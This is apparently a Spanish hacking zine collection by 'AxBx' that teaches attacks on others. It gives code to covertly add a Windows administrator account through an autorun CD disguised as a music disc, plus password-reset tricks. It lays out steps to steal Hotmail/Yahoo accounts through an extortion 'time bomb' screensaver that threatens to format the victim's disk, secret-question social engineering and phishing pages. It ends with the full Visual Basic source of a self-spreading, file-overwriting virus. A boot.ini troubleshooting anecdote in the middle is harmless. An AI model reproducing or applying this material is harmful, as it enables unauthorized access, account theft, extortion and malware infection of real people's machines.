Técnicas para quitar la contraseña de un administrador en WINNT4/WIN2000/XP

por AxBx

Antes de comenzar quisiera decir que esta información no es nada nueva y no posee gran ciencia así que realmente me siento apenado tratando de explicarla en esta sección, pero bueno ahí va la explicación...

Métodos:

Este método consiste en elaborar un disco autoarrancable que permita "engañar" al administrador haciéndolo pasar por un CD de música.

Realmente podemos hacer 2 cosas con este método:

    1.-Cambiar el password del administrador por otro

    2.-Crear una cuenta con privilegios de administrador

Debo de recalcar que este método solo se puede llevar a cabo en redes con una seguridad muy inferior a los estándares actuales, ya que requiere de que nuestros datos(el CD) penetren directamente a la maquina del administrador, lo cual se da en muy muy pocas ocasiones.

Basándonos en los siguientes comandos con sus respectivas ayudas tenemos que:

Net user

Agrega o modifica cuentas de usuario o muestra información acerca de ellas.

Sintaxis

net user [nombreDeUsuario [contraseña | *] [opciones]] [/domain]

net user nombreDeUsuario {contraseña | *} /add [opciones] [/domain]]

net name [nombreDeUsuario [/delete] [/domain]]

Parámetros

NombreDeUsuario
Especifica el nombre de la cuenta de usuario que se desea agregar, eliminar, modificar o ver. El nombre de la cuenta de usuario puede tener hasta 20 caracteres.
Contraseña
Asigna o cambia una contraseña para la cuenta de usuario. Escriba un asterisco (*) si desea que se le pida la contraseña. Los caracteres de la contraseña no se muestran en la pantalla a medida que los escribe.
/domain
Realiza la operación en el controlador principal del dominio principal del equipo.

Net localgroup

Agrega, muestra o modifica grupos locales. Escriba net localgroup sin parámetros para mostrar el nombre del servidor y los nombres de los grupos locales del equipo.

Sintaxis

net localgroup [nombreDeGrupo [/comment:"texto"]] [/domain]

net localgroup [nombreDeGrupo {/add [/comment:"texto"] | /delete} [/domain]]

net localgroup [nombreDeGrupo nombre [ ...] {/add | /delete} [/domain]]

Parámetros

NombreDeGrupo
Especifica el nombre del grupo local que se va a agregar, expandir o eliminar. Si se usa sin parámetros adicionales, net localgroup nombreDeGrupo muestra la lista de usuarios o grupos globales de un grupo local.
/comment:"texto"
Agrega un comentario a un grupo nuevo o existente. El comentario puede contener hasta 48 caracteres. Escriba el texto entre comillas.
/domain
Realiza la operación en el controlador principal del dominio actual. Si no se especifica este parámetro, la operación se realizará en el equipo local.
Nombre [ ...]
Enumera uno o varios nombres de usuarios o grupos que se agregarán o quitarán de un grupo local.
/add
Agrega un nombre de grupo global o un nombre de usuario a un grupo local. Debe establecerse una cuenta para los usuarios o grupos globales que se agreguen a un grupo local con este comando.
/delete
Quita un nombre de grupo o un nombre de usuario de un grupo local.
net help comando
Muestra ayuda para el comando net especificado.

Comentarios

Esto nos permite construir las siguiente sintaxis para un .cmd:

 net user <nombre_del_usuario_administrador> nuevopassword

Si es el caso de: cambiar el password del administrador por un nuevo password.Pero también podemos hacer una nueva cuenta con privilegios administrativos lo cual nos llevaría a la siguiente función en Visual Basic:

Function agregarRoot(usuario As String, password As String, etiqueta As String)
On Error Resume Next

'Se crea un nuevo usuario

cadena = "net user " & usuario & " " & password & " " & "/add /passwordreq:yes /fullname:" & etiqueta

'Se agrega el usuario al dominio de los administradores

cadena2 = "net localgroup administradores " & usuario & " /add"

a = Shell(cadena, vbHide)

b = Shell(cadena2, vbHide)

End Function

La cual tendría un uso como el que sigue:

s = agregarRoot("09300669", "carbinol", "09300669")

   Donde:

         1er parámetro=Nombre del usuario victima (Un Administrador por ejemplo)

         2do parámetro=Nuevo password para la victima

         3er parámetro=Descripción del usuario

El tercer parámetro puede omitirse si se desea haciendo las modificaciones correspondientes a la función.

Ahora tenemos que programar los comandos en el lenguaje preferido procurando que sean discretos para que una vez obtenido el ejecutable pasemos a la ultima etapa la cual consiste en quemar el CD con el programa y el archivo autorun.inf

+Estructura del Autorun.inf

[Autorun]

OPEN=nuestro_programa.exe

ICON=nuestro_icono.ico

Una vez finalizo todo el proceso lo que queda es tu habilidad para mentirle al administrador y conseguir que toque tu "pseudo disco de música"

NOTA: Pueden existir muchas variantes de este método las cuales no solo se limitan al CD, dado que el principio básico esta sentado, la creatividad en cuanto a su uso ya depende de la capacidad de cada uno.

Este método es muy bueno aunque tiene sus ligeros inconvenientes, dichos inconvenientes dependen en gran parte del sistema de archivos utilizado por el  S.O.(he detectado ciertos fallos cuando se trata de un FAT o un FAT32).

Se basa en el uso de una utilería diseñada para Linux pero que azares del destino(nunca fue el propósito en si del programa) provoca un error que permite borrar el password del administrador.

Lo primero que tenemos que hacer es bajar el programa:

LINUX_chntpw

Una vez bajado el programa tenemos que tener un disco flexible para poder elaborar un "disco de arranque para Linux",dicho disco se va utilizar para quitar la contraseña del administrador.

Una vez creado el disco de inicio vamos a insertarlo en la maquina que deseamos atacar, cabe mencionar que la maquina a la que ataquemos debe de estar mas o menos descuidada ya que se tienen que efectuar varios pasos a la hora de correr el programa.

Cuando enciendas la computadora (con el disco adentro)apareceran varias leyendas a las cuales tienes que responder con Yes.

Cuando llegues a la parte en la que te pide que modifiques el password de los usuarios, selecciona al Administrador y cambia el passowrd a BLANK( o *).

Vuelve a responder con Yes a todo y reinicia la computadora, al iniciar el administrador no tendrá contraseña y tu podrás acceder fácilmente.

Este método es uno de los mas conocidos pero no funciona en todas las maquinas, a continuación se detalla su uso:

1.-Copiar el cmd.exe a una carpeta por separado

2.-Copiar el logon.scr a una carpeta por separado

3.-Renombrar el cmd.exe por Logon.scr

4.-Regresar el logon.scr a su lugar de origen

 

<<"Error al Cambiar Windows Me por Windows 2000">>

Por AxBx

Si de puritita casualidad tienes problemas para cambiar Windows Me por Windows 2000 aqui hay una anécdota que podría ser de utilidad para ti:

===================
Error al instalar Windows
===================

Recientemente me encontré con una maquina que poseía Windows ME y dada la lentitud del sistema se me hizo fácil cambiarle el S.O. por XP, las características del PC eran las siguientes:

+Procesador AMD Duron de 800Mhz
+64 MB de Memoria
+Unidad de Disco Duro de 30 GB
+PCI NIC 10/100Mb
+2 particiones del disco duro (c: y d:)


En fin, alguien me menciono que una instalación de Windows XP en este tipo de maquina no iba a ser precisamente muy útil así que de todos modos me aventure a instalar el XP.

La primera fase de la instalación transcurrió sin problemas hasta que al finalizar el proceso me pidió que reiniciara la maquina y entonces vino el error el cual mencionaba que el NTLDR no podía encontrar la partición de inicio

Entonces me dispuse a formatear c: con NTFS pero no surtió efecto, después la formatee con FAT32 Y FAT pero tampoco, Después elimine la partición d: y deje solo una partición con NTFS ya que ni por esta se pudo instalar el XP me propuse entrar al modo consola para ver que podía reparar con los comandos bootcfg,fixboot y diskpart,el primero me dio opciones muy limitadas que no satisfacían, el segundo se ejecuto con éxito pero el problema persistía y el ultimo funcionaba pero tampoco solucionaba el problema.

Después trate de instalar el Windows 2000, este reinicio normalmente y después marco un error que decía: "No se puede encontrar el disco de inicio especificado, Error de configuración en el Hardware cheque la ruta de inicio", también marcaba antes de instalarlo otro error que decía "Imposible abrir la partición seleccionada",esto me obligo a pensar que el disco duro estaba dañado o algo así pero al entrar al BIOS no hubo mayores problemas.

Me pregunte si estos 2 sistemas operativos basados en tecnología NT eran demasiado para la PC así que trate de instalarle el WIN98 pero el error fue aun mas extraño, este decía "Error fatal de entero dividido por 0" y no lo instalaba, llegue a pensar que el disco tenia alguna especie de protección pero se me hizo muy ilógico.

Cuando me iba a dar por vencido trate de entrar al modo consola (con la instalación del 2000) y fue cuando trate de formatearla nuevamente, no sin antes tratar de cambiarme al directorio raíz para ver que se podía hacer pero esta operación era inútil ya que no funcionaba el CD,lo mas extraño fue que al tratar de formatear c: la maquina marco una seria de errores que hicieron que cambiara de directorio dándome acceso a c:\ sin formatear nada

En c: se encontraba el fichero boot.ini que sabia que algo tenia que ver en todo este embrollo así que recordé que alguna vez trate de descomponer un PC quitándole este fichero pero el sistema iniciaba con lo primero que encontrara, pero si en cambio lo modificaba y le ponía estupideces no iniciaba la computadora debidamente, fue entonces que abrí el boot.ini y note lo siguiente:

[boot loader]
time out=1
default=signature(675f)disk(1)rdisk(0)partition(1)\WINNT
[operating systems]
signature(675f)disk(1)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Professional" /fastdetect

Todo parece normal menos (a mi juicio) el "signature(675f)" que no se que demonios quiera decir, fuera o no algo erróneo algo definitivamente estaba mal con el boot.ini así que lo borre y cual fue mi sorpresa que al inicio marco un error donde decía que no estaba el boot.ini pero inicio Windows 2000 sin ningún problema para continuar la instalación.
 

En nuestra próxima entrega tendremos: Un ejecutable dentro de HTML

 

 

HACKEANDO CUENTAS HOTMAIL O YAHOO

Por AxBx

Una vez en la Internet encontré una pagina en donde se explicaba como "hackear" una cuenta de correo Hotmail o yahoo pero esta pagina tenia su truquito el cual consistía en que el infortunado imbecil creyera el cuento de poner en el asunto su password y después  mandarlo a una dirección llamada administrador@hotmail.com para que  supuestamente le llegara un correo con el password de la victima cosa que nunca sucedería ya que los" hackeados"  fuimos nosotros.

Dada la gran cantidad de paginas que proliferaron de este categoría hice la suposición de que una buena parte de la sociedad esta algo estupida.

Hackear una cuenta de correo puede sernos tan útil como inútil, es decir si quieres ver si tu novio ve porno o si tu novia te esta poniendo el cuerno mejor ni te lo preguntes ya que...¡es un hecho que el esta viendo porno y es un hecho que ella te pone el cuerno! así que mejor busca a un Administrador de redes, o alguien que tenga cosas mas interesantes en su cuenta.

NOTA DEL AUTOR: De todos los correos hackeados en mi corta practica puedo decir que la mayoría solo contiene porno y cartitas cursis, un pequeño porcentaje posee passwords y documentos de importancia.

Bien vayamos a los tres métodos infantiles para Hackear Hotmail o Yahoo:

1.- MÉTODO DESTREX

Este es el método menos elegante de todos los que presentare pero no por ello resulta menos eficaz en su objetivo que es el hackear la cuenta, cabe destacar que este método es brusco y quita la contraseña de la victima definitivamente por lo que no podrá entrar jamás a su cuenta, este método puede utilizarse en casos extremos en los que se tiene la certeza de que hay algo muy valioso para nosotros en la cuenta

PASOS:

1.-Elaborar una bomba de tiempo (en el lenguaje de tu preferencia) que de una tolerancia a lo máximo de  5 minutos  antes de reiniciar el ordenador y destruirlo, además de presentar una pantalla que despliegue el tiempo que le queda antes de estallar junto a un mensaje que diga "DAME LA CONTRASEÑA DE TU CORREO PARA QUE TE DIGA COMO DESACTIVAR LA BOMBA O DE LO CONTRARIO SE FORMATEARA TU DISCO", y que desactive las teclas ctrl+alt+supr (si no sabes como hacer una simple bomba de tiempo esperate al siguiente numero o mandame un correo a kloaka2003@hotmail.com)

2.-Renombra la bomba de bomba.exe a Navidad.scr

3.-Encuentra una victima en el Messenger de Yahoo o Hotmail

4.-Practícale ingeniería social a la victima( lavale la cabeza) y haz que acepte el protector de pantalla Navidad.scr

5.-Pidele que ejecute el salvapantallas

6.-Cuando muestre señas de estar alterado pidele que te de la contraseña

7.-Recibe la contraseña y pruébala( sin dejar de amenazarlo), si esta no es la correcta deja que se formatee su maquina

8.-Si es que la contraseña es correcta abandona la conversación (déjalo que estalle en pedacitos)

9.-Tapa los agujeros es decir cambia su password por otro nuevo y toda la información de su perfil

10.-Listo ahora ponte a indagar en sus archivos y contactos.

NOTA: El autor sugiere el uso de la bomba destructiva para lograr una mayor eficacia pero si se desea puede hacerse una bomba falsa que solo despliegue el mensaje

2.-MÉTODO DE INGENIERÍA SOCIAL O DE LA PREGUNTA SECRETA

Este es uno de los métodos mas sencillos y prácticamente esta al alcance de todos aquí ya que solo consiste en sabe como realizar las preguntas, cabe mencionar que este también es otro método brusco y poco elegante.

PASOS:

1.-Localiza el correo de la victima

2.-Observa cual es su "Pregunta secreta"

3.-Localiza a la victima en el Messenger (Yahoo o Hotmail)

4.-Realiza Ingeniería social de tal modo que llegues "amablemente" a la respuesta de su pregunta secreta

5.-Prueba la pregunta secreta

6.-En caso de ser afirmativa cambia rápidamente el password y el perfil

7.-Listo, ahora posees una cuenta ajena de correo Hotmail.

 

3.-MÉTODO DEL CAMALEÓN

Este  método, a mi gusto, es mas elegante qué los anteriores ya que no es  brusco  y nos permite espiar a la victima por largos periodos dado que no se quita la contraseña solo la averigua y nos la proporciona

Pasos:

1.-Construya una pagina Web con un formulario de respuesta direccionado a su correo, la pagina Web debe de aparentar ser de Hotmail o de Yahoo (incluya imágenes iconos y otras pestes),incluya los campos nombre de usuario y contraseña además de una excusa para que la victima vuelva a proporcionar sus datos, no olvide que después de mandar los datos la victima debe de ser enviada al sitio web de Yahoo o de Hotmail para evitar sospechas.

2.-Consiga un correo anónimo ( puede ser html o aplicación)

3.-Suba la pagina a la Internet procurando que la dirección de la pagina muestre algo relacionado con Hotmail o Yahoo

4.-Localice a un victima

5.-Redacte un correo a la victima desde el correo anónimo alegando una excusa para abrir el vinculo a nuestra pagina de Internet, recuerde que el remitente debe de ser algo como microsoft@hotmail.com o yahoomail@yahoo.com

6.-Espera un par de días a que conteste el formulario y entonces revisa tu correo, si tienes suerte habrá un correo que diga "Respuestas de tu formulario" el cual contendrá el password de la victima.

Es interesante el hecho de que este método pueda ser ocupado también para hackear paginas Web de webmasters estupidos.

 

UN VIRUS SIMPLE EN VISUAL BASIC

Por AxBx

TIYAHEY Y SUS ENGENDROS NACIONALISTAS

"Un virus mediocre para una nación mediocre"

 

El virus tiyahey que a continuación se explica es de primitivas características pero no deja de ser eficaz en su objetivo, ya que se basa en la infección por sobre escritura de los archivos que nosotros le indiquemos, se pueden hacer ligeras modificaciones a su código únicamente para asegurar la infección o detallar la broma que deseamos esparcir entre los usuarios, la ventaja que tiene este virus desarrollado en visual basic es su fácil modificación y la rápida infección que tiene este sobre el sistema infectado, aunque es fácil de retirar no siempre es posible erradicarlo por completo. Este virus llego a finales de los años 90 y tuvo su auge solo en pequeños laboratorios escolares con consecuencias catastróficas cuando infecto los archivos de sistema.

Secuencia de operaciones del virus Tiyahey:

1.-Cargar el virus en el sistema y en el registro

2.-Infectar todos los .exe que se encuentren en el directorio activo

3.-Checar si existe un disco flexible, en caso de existir infectar el disco

4.-Checar si el tiempo es el adecuado para el "Payload"

5.-Repetir la infección en busca de un disco flexible

A continuación el código del virus en su variante para desactivar el Portapapeles y mostrar una leyenda de infección,  cortesía de AxBx:

NOTA:EL VIRUS REQUIERE QUE SE CREEN LOS SIGUIENTES OBJETOS:

1.-2 Timers con la propiedad Interval en 6000 y 2000, el primero efectúa la infección en busca de un disco y el segundo inhabilita el Portapapeles

2.-1 DriveListBox

3.-2 FileListBox

'Virus:Tiyahey.Clippboard por AxBx


Private Sub carga() 'Funcion de carga en el sistema

Set regedit = CreateObject("Wscript.shell")
regedit.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\rare", "c:\windows\help\mswind.exe"
'El virus es agregado al registro

boot_name = App.EXEName
my_path = App.Path
ruta1 = my_path & "\" & boot_name & ".exe"

FileCopy ruta1, "c:\windows\help\mswind.exe" 'Copiamos el virus a windows

End Sub
Private Sub infeccion(extension As String)
On Error Resume Next 'Al encontrar error ir a la siguiente linea

Dim FileNum As Integer 'Variable para asignar el numero unico de archivo
Dim coco As Byte 'Variable para caracteres
FileNum = FreeFile 'obtiene numero unico para un archivo

y = App.Path 'Proporciona nuestro path
z = App.EXEName 'Proporciona el nombre exe en ese instante
virus = y + "\" + z 'Construye el nombre y la ruta del virus

FileCopy virus + ".exe", "c:\" + z + ".exe"

HUESPED_INFECTADO = "c:\" + z + ".exe"

File1.Pattern = extension 'la extension que deseamos infectar como parametro

re = File1.ListCount 'Para contar los archivos que hay en el directorio

For x = 0 To re 'dentro del ciclo de archivos

File1.ListIndex = x

na = File1.FileName
ruta = File1.Path

ARCHIVO = ruta + "\" + na 'archivo huesped

'apertura del archivo contaminado
Open HUESPED_INFECTADO For Binary As FileNum
'apertura del archivo contaminado

'apertura de archivos no contaminados
Open ARCHIVO For Binary As #2
'apertura de archivos no contaminados

For u = 1 To LOF(FileNum)

Get #FileNum, u, coco

t = ChrB(coco) 'Conversion de numero a letra

Put #2, u, coco
Next u

Close #FileNum
Close #2

Next x

Kill HUESPED_INFECTADO 'Desechamos el huesped

End Sub
Function infeccion2(extension As String, unidad As String, opcional As String)
On Error Resume Next 'Al encontrar error ir a la siguiente linea
File2.Path = unidad

Dim FileNum As Integer 'Variable para asignar el numero unico de archivo
Dim coco As Byte 'Variable para caracteres
FileNum = FreeFile 'obtiene numero unico para un archivo

y = App.Path 'Proporciona nuestro path
z = App.EXEName 'Proporciona el nombre exe en ese instante

virus = y + opcional + z 'Construye el nombre y la ruta del virus

FileCopy virus + ".exe", "c:\" + z + ".exe"

HUESPED_INFECTADO = "c:\" + z + ".exe"

File2.Pattern = extension 'la extension que deseamos infectar como parametro

re = File2.ListCount 'Para contar los archivos que hay en el directorio

For x = 0 To re 'dentro del ciclo de archivos

File2.ListIndex = x

na = File2.FileName
ruta = File2.Path

ARCHIVO = ruta + na 'archivo huesped

'apertura del archivo contaminado
Open HUESPED_INFECTADO For Binary As FileNum
'apertura del archivo contaminado

'apertura de archivos no contaminados
Open ARCHIVO For Binary As #2
'apertura de archivos no contaminados

For u = 1 To LOF(FileNum)

Get #FileNum, u, coco

t = ChrB(coco) 'Conversion de numero a letra

Put #2, u, coco
Next u

Close #FileNum
Close #2

Next x

Kill HUESPED_INFECTADO 'Desechamos el huesped

End Function

Private Sub Form_Load()
On Error Resume Next 'Al encontrar error ir a la siguiente linea

App.TaskVisible = False 'lo ocultamos de los procesos

carga 'Cargamos el virus

x = Drive1.Drive 'tomamos el drive

If x = "a:" Then 'Si esta dentro de a:
a = infeccion2("*.exe", "a:\", "") 'Llamada de la funcion
'El argumento opcional esta deshabilitado ya que no se require de una nueva separacion de a:\virus.exe
Else 'Si esta dentro de c:
infeccion ("*.exe") 'Llamada de la funcion
d = infeccion2("*.exe", "a:\", "\")

End If

End Sub


Private Sub Timer1_Timer()
Form_Load 'Volvemos a repetir la infeccion en busca de un disco de 3 1/2

End Sub

Private Sub Timer2_Timer()
Clipboard.Clear 'Clipboard.SetText ("Tu has sido infectado con el virus Tiyahey.Clipboard")
End Sub